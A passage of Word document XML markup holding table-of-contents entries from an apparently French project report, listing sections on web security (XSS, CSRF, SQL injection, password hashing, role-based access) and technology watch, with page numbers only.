        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C29E16E" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817782" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7. PRÉSENTATION DES ÉLÉMENTS DE SÉCURITÉ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817782 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DBA2289" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817783" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Cross-Site Scripting (XSS)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817783 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78CBB8FC" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817784" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Cross-Site Request Forgery (CSRF)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817784 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A8485DF" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817785" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Injection SQL</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817785 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09108C43" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817786" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Protection des mots de passe</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817786 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AE1AE6B" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817787" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7.1 Sécurité côté front-end</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817787 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EED3509" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817788" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Protection contre le XSS</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817788 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D185EE8" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817789" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Protection contre le CSRF</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817789 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AFDAC71" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817790" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Validation des entrées côté client</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817790 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70CD53CC" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817791" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>RGPD et mentions légales</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817791 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1014B6EB" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817792" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7.2 Sécurité côté back-end</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817792 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05BA07F4" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817793" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Protection contre les injections SQL</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817793 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CCFC00E" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817794" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Authentification et hachage des mots de passe</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817794 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5907BD90" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817795" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Contrôle des accès par rôle</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817795 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19002D68" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817796" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Validation côté serveur et protection des données sensibles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817796 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36DABE6E" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817797" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>8. VEILLE TECHNOLOGIQUE</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817797 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00C85F07" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817798" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>8.1 Outils et sources de veille utilisés</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817798 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21F23396" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817799" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>8.2 Exemple de veille</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817799 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
